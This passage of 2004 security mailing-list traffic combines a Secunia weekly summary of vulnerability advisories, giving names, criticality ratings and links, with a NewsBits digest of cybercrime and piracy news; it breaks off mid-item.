the ISTS. ISTS is a research, not operational, organization, and makes its Security in the News
e-mail available as a public service on a best-effort basis. Security in the News will be sent out
on most business days, but not all.

Institute for Security Technology Studies
Dartmouth College
45 Lyme Road, Suite 200
Hanover, NH 03755
Tel: (603) 646 0700
E-mail: dailyreport@ists.dartmouth.edu

------------------------------------------------------------------------
Information is the currency of victory on the battlefield.
GEN Gordon Sullivan, CSA (1993)
------------------------------------------------------------------------

INFOCON Mailing List @
IWS - The Information Warfare Site
http://www.iwar.org.uk

------------------------------------------------------------------------
To subscribe, change your subscription or unsubscribe go to http://www.iwar.org.uk/mailman/listinfo/infocon/
------------------------------------------------------------------------

SEC: Guilty plea on computer hacking

Guilty plea on computer hacking - 2004-07-08 - Silicon Valley/San Jose Business Journal

SEC: Secunia Weekly Summary - Issue: 2004-28

Gmail - [ISN] Secunia Weekly Summary - Issue: 2004-28

========================================================================

The Secunia Weekly Advisory Summary
2004-07-01 - 2004-07-08

This week : 47 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

New Features at Secunia.com

Secunia has implemented various statistical features at the websites
for both Secunia advisories and Virus Information.

Secunia Advisories Statistics:
http://secunia.com/advisory_statistics/

Examples of Specific Product Statistics:
http://secunia.com/product/11/ (Internet Explorer 6)
http://secunia.com/product/761/ (Opera 7.x)
http://secunia.com/product/1480/ (Mozilla 1.3)

Secunia Virus Information Statistics:
http://secunia.com/virus_statistics/

Furthermore, Secunia has made it possible for you to include all graphs
available at secunia.com on your own website.

This is described in detail at:
http://secunia.com/secunia_image_inclusion/

========================================================================
2) This Week in Brief:

ADVISORIES:

IBM Lotus Domino Web Access (formerly iNotes) is vulnerable to an
issue, which can be exploited by malicious people to cause a DoS
(Denial of Service).

The vulnerability is caused due to an unspecified error when
processing mails and can be exploited by sending a mail containing an
overly large, specially crafted JPG image attachment (about 12 MB) to
a vulnerable system.

Successful exploitation reportedly crashes the whole Domino server,
when the mail is opened.

http://secunia.com/SA12007

Mozilla and Mozilla Firefox are vulnerable to an issue, which allows
malicious websites to trick users into accepting security dialog boxes.

The problem is that it may be possible to trick users into typing or
clicking on a XPInstall / Security dialog box, using various
interactive events, without the user noticing the dialog box.

Successful exploitation may allow a malicious website to perform tasks
that require user interaction.

http://secunia.com/SA12007

VIRUS ALERTS:

During the last week, Secunia issued two MEDIUM RISK virus alerts.
Please refer to the grouped virus profile below for more information:

Bagle.AD - MEDIUM RISK Virus Alert - 2004-07-04 21:48 GMT+1
http://secunia.com/virus_information/10430/bagle.ad/

Lovgate.Y - MEDIUM RISK Virus Alert - 2004-07-02 02:29 GMT+1
http://secunia.com/virus_information/10388/lovgate.y/

========================================================================
3) This Weeks Top Ten Most Read Advisories:

1. [SA11978] Multiple Browsers Frame Injection Vulnerability
2. [SA11966] Internet Explorer Frame Injection Vulnerability
3. [SA11793] Internet Explorer Local Resource Access and Cross-Zone
Scripting Vulnerabilities
4. [SA10395] Internet Explorer URL Spoofing Vulnerability
5. [SA11999] Mozilla XPInstall Dialog Box Security Issue
6. [SA11996] Linux Kernel File Group ID Manipulation Vulnerability
7. [SA11856] Mozilla Browser Address Bar Spoofing Weakness
8. [SA11901] Opera Address Bar Spoofing Security Issue
9. [SA11830] Internet Explorer Security Zone Bypass and Address Bar
Spoofing Vulnerability
10. [SA12020] MySQL Authentication Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA12006] Easy Chat Server Multiple Vulnerabilities
[SA12026] Comersus Shopping Cart Cross-Site Scripting and Price
Manipulation
[SA12016] Fastream NETFile FTP/Web Server Directory Traversal
Vulnerability
[SA12011] Mbedthis AppWeb Multiple Vulnerabilities
[SA11985] Easy Chat Server Directory Traversal Vulnerability
[SA11988] WinGate Proxy File Retrieval Vulnerability
[SA12012] 12Planet Chat Server Cross-Site Scripting Vulnerability
[SA12022] UnrealIRCd IP Cloaking Bypassing Weakness

UNIX/Linux:
[SA12023] Red Hat update for httpd
[SA12017] Open WebMail "vacation.pl" Arbitrary Program Execution
Vulnerability
[SA12005] Debian update for webmin
[SA12002] Debian update for pavuk
[SA11989] Fedora update for mailman
[SA11982] Fedora update for kernel
[SA11980] Linux Kernel Netfilter TCP Option Matching Denial of Service
Vulnerability
[SA12004] Gentoo update for apache2
[SA12001] Gentoo update for pure-ftpd
[SA12000] Netegrity IdentityMinder Cross-Site Scripting Vulnerability
[SA11993] Fedora update for rsync
[SA11992] Pure-FTPd Multiple Connection Denial of Service
Vulnerability
[SA12025] Mandrake update for kernel
[SA12019] Gentoo update for xfree
[SA11998] Red Hat update for kernel
[SA11997] Fedora update for kernel
[SA11996] Linux Kernel File Group ID Manipulation Vulnerability
[SA12009] SuSE update for kernel
[SA12003] Gentoo update for kernel
[SA11991] Gentoo esearch Insecure Temporary File Creation
Vulnerability
[SA11990] IBM Informix I-Spy "runbin" Privilege Escalation
Vulnerability
[SA11986] RSBAC Privilege Escalation Vulnerabilities
[SA11983] FreeBSD Linux Compatibility Mode System Call Handling
Vulnerability
[SA11981] Linux Kernel Sbus PROM Driver Multiple Integer Overflow
Vulnerabilities
[SA12021] Linux VServer procfs Permission Weakness
[SA12008] Oracle 10g Installer Insecure Temporary File Creation

Other:
[SA12014] Enterasys XSR Routers "Record Route" Option Denial of
Service
[SA12018] D-Link DI-624 Multiple Vulnerabilities
[SA11994] NetScreen 5GT Firewall AV Scan Engine Cross-Site Scripting
Vulnerability
[SA11984] ZyXEL Prestige Routers Denial of Service Vulnerability

Cross Platform:
[SA12013] IBM WebSphere Application Server Denial of Service
[SA12007] IBM Lotus Domino Web Access Message Handling Denial of
Service
[SA11999] Mozilla XPInstall Dialog Box Security Issue
[SA11987] Centre Inclusion of Arbitrary Files and SQL Injection
[SA12024] Ethereal Multiple Vulnerabilities
[SA12020] MySQL Authentication Vulnerabilities
[SA12015] SCI Photo Chat Cross-Site Scripting Vulnerability
[SA12010] Brightmail Unauthorised Access to Filtered Mails
[SA11995] Lotus Domino IMAP Quota Manipulation Weakness

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA12006] Easy Chat Server Multiple Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2004-07-05

Multiple vulnerabilities have been reported in Easy Chat Server,
allowing malicious people to cause a DoS (Denial of Service), conduct
cross-site scripting attacks, and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12006/

--

[SA12026] Comersus Shopping Cart Cross-Site Scripting and Price
Manipulation

Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2004-07-08

Thomas Ryan has reported some vulnerabilities in Comersus Shopping
Cart, which can be exploited by malicious people to conduct cross-site
scripting attacks or manipulate orders.

Full Advisory:
http://secunia.com/advisories/12026/

--

[SA12016] Fastream NETFile FTP/Web Server Directory Traversal
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2004-07-06

aT4r ins4n3 has reported a vulnerability in Fastream NETFile FTP/Web
Server, allowing malicious people to retrieve arbitrary files.

Full Advisory:
http://secunia.com/advisories/12016/

--

[SA12011] Mbedthis AppWeb Multiple Vulnerabilities

Critical: Moderately critical
Where: From remote
Impact: Unknown, Security Bypass, Exposure of sensitive
information
Released: 2004-07-07

Multiple vulnerabilities have been discovered in Mbedthis AppWeb. Some
currently have an unknown impact and others may be exploited by
malicious people to gain knowledge of sensitive information or bypass
certain security restrictions.

Full Advisory:
http://secunia.com/advisories/12011/

--

[SA11985] Easy Chat Server Directory Traversal Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information, Exposure of system
information
Released: 2004-07-02

Dr_insane has reported a vulnerability in Easy Chat Server, which can
be exploited by malicious people to read arbitrary files on a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/11985/

--

[SA11988] WinGate Proxy File Retrieval Vulnerability

Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Exposure of sensitive information
Released: 2004-07-02

iDefense has reported a vulnerability in WinGate, allowing malicious
people to retrieve arbitrary files.

Full Advisory:
http://secunia.com/advisories/11988/

--

[SA12012] 12Planet Chat Server Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-05

Donato Ferrante has reported a vulnerability in 12Planet Chat Server,
which can be exploited by malicious people to conduct cross-site
scripting attacks.

Full Advisory:
http://secunia.com/advisories/12012/

--

[SA12022] UnrealIRCd IP Cloaking Bypassing Weakness

Critical: Not critical
Where: From remote
Impact: Security Bypass
Released: 2004-07-06

bartavelle has reported a weakness in UnrealIRCd, which can be
exploited by malicious users to bypass certain security features.

Full Advisory:
http://secunia.com/advisories/12022/

UNIX/Linux:--

[SA12023] Red Hat update for httpd

Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2004-07-06

Red Hat has issued an update for httpd. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12023/

--

[SA12017] Open WebMail "vacation.pl" Arbitrary Program Execution
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-06

Ken Girrard has reported a vulnerability in Open WebMail, which can be
exploited by malicious users to execute arbitrary application.

Full Advisory:
http://secunia.com/advisories/12017/

--

[SA12005] Debian update for webmin

Critical: Moderately critical
Where: From remote
Impact: Security Bypass, DoS
Released: 2004-07-05

Debian has issued an update for webmin. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/12005/

--

[SA12002] Debian update for pavuk

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-05

Debian has issued an update for pavuk. This fixes a vulnerability,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12002/

--

[SA11989] Fedora update for mailman

Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2004-07-02

Fedora has issued an update for mailman. This fixes a vulnerability,
which can be exploited by malicious people to retrieve members'
passwords.

Full Advisory:
http://secunia.com/advisories/11989/

--

[SA11982] Fedora update for kernel

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-01

Fedora has issued an update for the kernel. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/11982/

--

[SA11980] Linux Kernel Netfilter TCP Option Matching Denial of Service
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-01

Adam Osuchowski and Tomasz Dubinski have reported a vulnerability in
the Linux kernel, which can be exploited by malicious people to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/11980/

--

[SA12004] Gentoo update for apache2

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Gentoo has issued an update for apache2. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/12004/

--

[SA12001] Gentoo update for pure-ftpd

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Gentoo has issued an update for pure-ftpd. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/12001/

--

[SA12000] Netegrity IdentityMinder Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-05

HEXVIEW has reported a vulnerability in Netegrity IdentityMinder,
allowing malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/12000/

--

[SA11993] Fedora update for rsync

Critical: Less critical
Where: From remote
Impact: Security Bypass, Manipulation of data
Released: 2004-07-02

Fedora has issued an update for rsync. This fixes a vulnerability,
potentially allowing malicious people to write files outside the
intended directory.

Full Advisory:
http://secunia.com/advisories/11993/

--

[SA11992] Pure-FTPd Multiple Connection Denial of Service
Vulnerability

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

A vulnerability has been discovered in Pure-FTPd, allowing malicious
people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/11992/

--

[SA12025] Mandrake update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data, Exposure of system information,
Exposure of sensitive information, Privilege escalation
Released: 2004-07-07

MandrakeSoft has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious users to bypass
certain security restrictions, gain knowledge of sensitive information
or escalate privileges.

Full Advisory:
http://secunia.com/advisories/12025/

--

[SA12019] Gentoo update for xfree

Critical: Less critical
Where: From local network
Impact: Security Bypass
Released: 2004-07-06

Gentoo has issued an update for xfree. This fixes a security issue,
which potentially may allow malicious users to gain unintended access
to a system.

Full Advisory:
http://secunia.com/advisories/12019/

--

[SA11998] Red Hat update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data
Released: 2004-07-02

Red Hat has issued an update for the kernel. This fixes a
vulnerability, which can be exploited by malicious users to bypass
certain security restrictions

Full Advisory:
http://secunia.com/advisories/11998/

--

[SA11997] Fedora update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data, Privilege escalation, DoS
Released: 2004-07-02

Fedora has issued an update for the kernel. This fixes some
vulnerabilities, which can be exploited by malicious users to bypass
certain security restrictions, cause a DoS (Denial of Service) or
potentially gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11997/

--

[SA11996] Linux Kernel File Group ID Manipulation Vulnerability

Critical: Less critical
Where: From local network
Impact: Manipulation of data
Released: 2004-07-02

SuSE has discovered a vulnerability in the Linux kernel, which can be
exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/11996/

--

[SA12009] SuSE update for kernel

Critical: Less critical
Where: Local system
Impact: Exposure of system information, Exposure of sensitive
information, Privilege escalation
Released: 2004-07-05

SuSE has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious, local users to
gain escalated privileges, cause a DoS (Denial of Service), or gain
knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12009/

--

[SA12003] Gentoo update for kernel

Critical: Less critical
Where: Local system
Impact: Security Bypass, Exposure of system information, Exposure
of sensitive information, Privilege escalation, DoS
Released: 2004-07-05

Gentoo has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious users to gain
escalated privileges, cause a DoS (Denial of Service), or gain
knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12003/

--

[SA11991] Gentoo esearch Insecure Temporary File Creation
Vulnerability

Critical: Less critical
Where: Local system
Impact: Privilege escalation, DoS
Released: 2004-07-02

Tavis Ormandy has discovered a vulnerability in esearch for Gentoo
Linux, which can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/11991/

--

[SA11990] IBM Informix I-Spy "runbin" Privilege Escalation
Vulnerability

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-02

A vulnerability has been discovered in IBM Informix I-Spy, which can be
exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11990/

--

[SA11986] RSBAC Privilege Escalation Vulnerabilities

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-02

Two vulnerabilities have been reported in RSBAC, potentially allowing
malicious, local users to escalate their privileges.

Full Advisory:
http://secunia.com/advisories/11986/

--

[SA11983] FreeBSD Linux Compatibility Mode System Call Handling
Vulnerability

Critical: Less critical
Where: Local system
Impact: Exposure of system information, Exposure of sensitive
information, Privilege escalation
Released: 2004-07-02

Tim Robbins has discovered a vulnerability in FreeBSD, which can be
exploited by malicious, local users to gain knowledge of sensitive
information or gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11983/

--

[SA11981] Linux Kernel Sbus PROM Driver Multiple Integer Overflow
Vulnerabilities

Critical: Less critical
Where: Local system
Impact: Privilege escalation, DoS
Released: 2004-07-02

infamous41 has reported some vulnerabilities in the Linux kernel, which
can be exploited by malicious, local users to cause a DoS (Denial of
Service) and potentially gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11981/

--

[SA12021] Linux VServer procfs Permission Weakness

Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information, DoS
Released: 2004-07-06

Veit Wahlich has reported a weakness in Linux VServer, which can be
exploited by certain malicious, local users to cause a DoS (Denial of
Service) or gain knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12021/

--

[SA12008] Oracle 10g Installer Insecure Temporary File Creation

Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-05

Knud Erik Højgaard has reported a security issue in Oracle Database
10g, allowing malicious users to manipulate temporary files.

Full Advisory:
http://secunia.com/advisories/12008/

Other:--

[SA12014] Enterasys XSR Routers "Record Route" Option Denial of
Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-06

Frederico Queiroz has reported a vulnerability in Enterasys XSR-1800
and XSR-3000 Series, which can be exploited by malicious people to
cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/12014/

--

[SA12018] D-Link DI-624 Multiple Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: DoS, Cross Site Scripting
Released: 2004-07-06

Gregory Duchemin has reported multiple vulnerabilities in D-Link
DI-624, which can be exploited by malicious people to cause a DoS
(Denial of Service) or conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/12018/

--

[SA11994] NetScreen 5GT Firewall AV Scan Engine Cross-Site Scripting
Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-02

A vulnerability has been discovered in NetScreen ScreenOS, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/11994/

--

[SA11984] ZyXEL Prestige Routers Denial of Service Vulnerability

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-07-01

Sami Gascón has reported a vulnerability in ZyXEL Prestige, allowing
malicious people to cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/11984/

Cross Platform:--

[SA12013] IBM WebSphere Application Server Denial of Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-06

Leandro Meiners has reported a vulnerability in IBM WebSphere, allowing
malicious people to cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/12013/

--

[SA12007] IBM Lotus Domino Web Access Message Handling Denial of
Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Andreas Klein has reported a vulnerability in IBM Lotus Domino Web
Access (formerly iNotes), which can be exploited by malicious people to
cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/12007/

--

[SA11999] Mozilla XPInstall Dialog Box Security Issue

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-05

Jesse Ruderman has reported a security issue in Mozilla and Mozilla
Firefox, allowing malicious websites to trick users into accepting
security dialog boxes.

Full Advisory:
http://secunia.com/advisories/11999/

--

[SA11987] Centre Inclusion of Arbitrary Files and SQL Injection

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, System access
Released: 2004-07-02

Manip has reported two vulnerabilities in Centre, allowing malicious
people to include arbitrary files and conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/11987/

--

[SA12024] Ethereal Multiple Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-07-07

Three vulnerabilities have been discovered in Ethereal, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/12024/

--

[SA12020] MySQL Authentication Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Privilege escalation
Released: 2004-07-06

Chris Anley has reported two vulnerabilities in MySQL, allowing
malicious people to gain access to the database or the local system.

Full Advisory:
http://secunia.com/advisories/12020/

--

[SA12015] SCI Photo Chat Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-06

Donato Ferrante has reported a vulnerability in SCI Photo Chat,
potentially allowing malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/12015/

--

[SA12010] Brightmail Unauthorised Access to Filtered Mails

Critical: Not critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2004-07-05

Thomas Springer has reported a privacy issue in Brightmail, potentially
allowing malicious users to read arbitrary mails.

Full Advisory:
http://secunia.com/advisories/12010/

--

[SA11995] Lotus Domino IMAP Quota Manipulation Weakness

Critical: Not critical
Where: From remote
Impact: Security Bypass
Released: 2004-07-02

Andreas Klein has reported a weakness in Lotus Domino, which can be
exploited by malicious users to manipulate certain configuration
options.

Full Advisory:
http://secunia.com/advisories/11995/

========================================================================

Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

_________________________________________
Help InfoSec News with a donation: http://www.c4i.org/donation.html

SEC: [INFOCON] NewsBits - 07/08/04

Gmail - [INFOCON] NewsBits - 07/08/04

NewsBits for July 8, 2004
************************************************************

DrinkorDie suspect back in Oz jail
The alleged ringleader of a gang of Internet copyright
pirates was back in jail last night after US authorities
won the latest round in their battle to extradite him
from Australia on multi-million dollar software piracy
charges. Hew Raymond Griffiths, 41, of Bateau Bay, New
South Wales, returned to Silverwater jail after judge
Peter Jacobson ruled magistrate Daniel Reiss was wrong
to release him on bail in March. He said that Reiss's
reasoning was incorrect in concluding that no extraditable
offence had been committed. The judgment is a setback
for defence efforts to have Griffiths tried in Australia,
but it does not mark a definitive ruling.
http://www.theregister.co.uk/2004/07/08/drinkordie_suspect_remanded_again/
http://zdnet.com.com/2100-1104_2-5260914.html
http://news.zdnet.co.uk/business/legal/0,39020651,39159881,00.htm
- - - - - - - - - -
Five Guilty of Computer Sales to Terror Nations
A federal jury in Dallas convicted five brothers
of illegally selling computers to countries that
supported terrorism. The men, who ran a computer
company called InfoCom Corp., were convicted of
conspiracy to violate export regulations and
sanctions against Libya and making false statements
on export shipping documents. Defense lawyers said
the brothers — Ghassan, Basman, Bayan, Hazim and
Ihsan Elashi — were unfairly targeted for prosecution
because of their Middle Eastern background.
(LA Times article, free registration required)
http://www.latimes.com/technology/la-na-briefs8.1jul08,1,7499895.story
- - - - - - - - - -
Police keelhaul world's thickest DVD pirate
An Essex man has secured the title of the world's
thickest DVD pirate after walking into a Chelmsford
Trading Standards office and offering his illicit
wares to the gobsmacked staff. The master criminal
apparently didn't notice the sign above the door
before making his pitch. Trading Standards' officers
very naturally expressed a keen interest in the
bootlegged movies, at which point the man belatedly
realised his error and legged it. He did, however,
leave a memento of his visit - his stash of films
and £210 in cash.
http://www.theregister.co.uk/2004/07/08/worlds_thickest_pirate/
- - - - - - - - - -
Child porn collector gets two-year suspended sentence
An Englishman caught at his home in Cork with thousands
of pornographic images of children was given a two-year
suspended jail sentence today after it was claimed that
he had undergone psychiatric counselling and was no
longer a risk to others in the community. Mr Ashman
admitted last June the offence of knowingly having in
his possession on November 19, 2001, child pornography,
namely a Gateway computer containing naked images of
female children.
http://212.2.162.45/news/story.asp?j=109975032&p=yx9975738&n=109975792
- - - - - - - - - -
Ex-treasurer of firefighters group sentenced on child porn charge
A West Covina firefighter was sentenced Tuesday for
stealing money from a firefighters' group to pay for
visits to online child pornography sites. As part of
a negotiated agreement, Michael Brawn was sentenced
to three years of probation and also was ordered by
Superior Court Judge Mark Grant Nelson to register
as a sex offender.
http://www.mercurynews.com/mld/mercurynews/news/local/states/california/the_valley/9094963.htm
- - - - - - - - - -
NBI cracks down on hi-tech child porn
The National Bureau of Investigation last Saturday
arrested suspected members of a child pornography
ring operating in Laguna, GMA Network's "24 Oras"
newscast reported Monday. The suspects were said
to be pimping dozens of children, aged 5 to 16,
to foreigners by posting nude pictures on several
websites. An operation was set up in Calamba,
Laguna in which members of the NBI posed as
customers. Some of the suspects brought about 22
boys and girls as"samples," the newscast reported.
http://www.inq7.net/brk/2004/jul/05/brkinf_1-1.htm
- - - - - - - - - -
COP CHIEF PROBED OVER CHILD PORN
A POLICE chief is being investigated on suspicion of
accessing child pornography on the internet. Officers
raided the home of British Transport Police Chief Supt
David Bruce, 43, and seized his computer. He is the
highest-ranking policeman to be quizzed in the anti-
paedophile Operation Ore. Married Mr Bruce, from Milton
Keynes, Bucks, had been promoted a week before the raid
and was tipped to become a future Chief Constable. Last
night British Transport Police said: "Chief Supt Bruce
was suspended from duty on Tuesday, June 22, pending
an investigation by Thames Valley police."
http://www.mirror.co.uk/news/allnews/tm_objectid=14393950&method=full&siteid=50143&headline=cop-chief-probed-over-child-porn-name_page.html
- - - - - - - - - -
Conway newspaper editor faces child porn charges
A local newspaper editor, arraigned yesterday on charges
relating to child pornography and using a computer to
transmit the images, could face additional charges as
the investigation into the case continues. Guy Priel,
38, of Puddin Pond Drive, is the community editor for
the Conway Daily Sun. He was arrested last Friday,
following an investigation that began in May when Priel
allegedly exchanged e-mails with someone court papers
described as "a teenage male whose sexual preference"
is boys.
http://www.theunionleader.com/articles_showfast.html?article=40392
- - - - - - - - - -
Ex-assistant principal faces child-porn charges
A former Lufkin High School assistant principal has been
charged with possessing child pornography. Charles Dexter
Lewis, 35, was free today on $20,000 bail. He resigned
after being accused of sending nude pictures of himself
to a 16-year-old female student. Lewis was initially
charged with a misdemeanor of displaying harmful material
to a minor. But police told The Lufkin Daily News for
today's editions that a search of Lewis' home computers
found several photos and videos of children engaged
in sexual activity.
http://www.chron.com/cs/CDA/ssistory.mpl/metropolitan/2667352
- - - - - - - - - -
Former foster parent charged in child porn case
A former foster parent from Blue Hill, Jeffery D. Myers,
has been charged with manufacturing and possessing child
pornography and sexual assault of a child. Attorney
General Jon Bruning announced the charges - all felonies
- Wednesday morning. "He's a child pornographer. He took
these kids and he asked them to make movies," Bruning
said, holding up a computer disk. "There are hundreds of
pictures here that would make you sick to your stomach."
http://www.omaha.com/index.php?u_np=0&u_pg=1638&u_sid=1142009
- - - - - - - - - -
Lawsuit challenges Florida ballot-recount rules
Voter rights groups sued Florida election administrators
yesterday to overturn a rule that prohibits the manual
recounting of ballots cast with touch-screen machines,
a lawsuit with echoes of the state's disputed 2000
presidential election voting.
http://computerworld.com/governmenttopics/government/legalissues/story/0,10801,94401,00.html
- - - - - - - - - -
LA plans cybercafe teen curfew
Los Angeles is to impose a curfew on kids into
cybercafes because the venues have become a popular
hangout for truants and the focus of serious youth
violence in the city. Cybercafes (or PC baangs)
with more than five machines will need a police
license must install video cameras for security
under regulations put forward in Los Angeles City
Council yesterday. Children under 18 will be banned
from cafes on school days between 08.30am and
13.30pm and after 2200pm Cyber cafe customers will
be required to provide identification on request.
http://www.theregister.co.uk/2004/07/08/la_cybercafe_curfew/
http://www.usatoday.com/tech/news/2004-07-08-cybercafes_x.htm
http://www.latimes.com/technology/la-me-cyber8jul08,1,2137421.story
- - - - - - - - - -
Feds drag feet on cybersecurity, officials say
Business and government representatives teamed up
in March to recommend steps to reduce the nation's
vulnerability to cyberattacks. But they say they
have yet to receive a response from the U.S.
Department of Homeland Security, and wonder what
is causing the delay. "There has been a 'pregnant
pause' waiting for a response," says Rick White,
CEO of TechNet, a technology industry trade group
and co-sponsor of a December 2003 summit to develop
an action plan.
http://computerworld.com/securitytopics/security/story/0,10801,94391,00.html
- - - - - - - - - -
Security hole found in Mozilla browser
update Developers at the open-source Mozilla
Foundation have confirmed that the latest version
of their Web browsers have a security flaw that
could allows attackers to run existing programs
on the Windows XP operating system. The flaw,
known as the "shell" exploit, was publicized
Wednesday on a security mailing list, along with
a link to a fix for the problem. Updated versions
of the affected software programs, which include
the Mozilla, Firefox and Thunderbird browsers,
have been released.
http://news.com.com/Security+hole+found+in+Mozilla+browser/2100-1002_3-5262676.html
- - - - - - - - - -
Sexual abuse online
According to Washington ProFile, every fifth under
age user of the Internet runs the risk of online
sexual abuse. These statistics are given in the
report of the National Center for Missing and
Exploited Children. Sexual molestation is a proposal
to enter into sexual activity or provide sexual
information (images, video). The authors of the
survey did not register any case when Internet
molestation led to real sexual contact or violation.
http://www.crime-research.org/news/08.07.2004/475/
- - - - - - - - - -
Fast backs Whitehall copyright clampdown
Federation Against Software Theft welcomes DTI
intellectual property crime strategy. The Federation
Against Software Theft (Fast) has welcomed government
moves to clamp down on copyright piracy. The Department
of Trade and Industry (DTI) has established the Creative
Industries IPR Forum to provide a national strategy
for dealing with intellectual property (IP) crime.
http://www.vnunet.com/news/1156519
- - - - - - - - - -
Government keeps mum on IT project monitoring
The government has rejected calls for the Gateway
IT project monitoring reports to be published.
Treasury financial secretary Ruth Kelly told MPs
that the confidentiality of the Gateway process,
run by Whitehall buying agency the Office of
Government Commerce (OGC), is key to its success.
http://www.vnunet.com/news/1156505
- - - - - - - - - -
Cybsecurity research underfunded, executives say
The National Science Foundation can only fund a
subset of the research proposals it receives on
ways to better IT system security, an NSF official
said at a House technology subcommittee hearing.
"There are good ideas in the cybersecurity area
that we're simply not able to fund," Peter Freeman,
assistant director of NSF's computer and information
science and engineering directorate, said at
yesterday's hearing.
http://www.gcn.com/vol1_no1/daily-updates/26526-1.html
- - - - - - - - - -
Stolen a film? MPAA wants to know
One in four people online has illegally downloaded
a feature film--and it's cutting into box-office and
DVD sales, the Motion Picture Association of America
said in a study released Thursday. A survey of 3,600
Internet users in eight countries showed that as many
as 50 percent had downloaded copyrighted content in
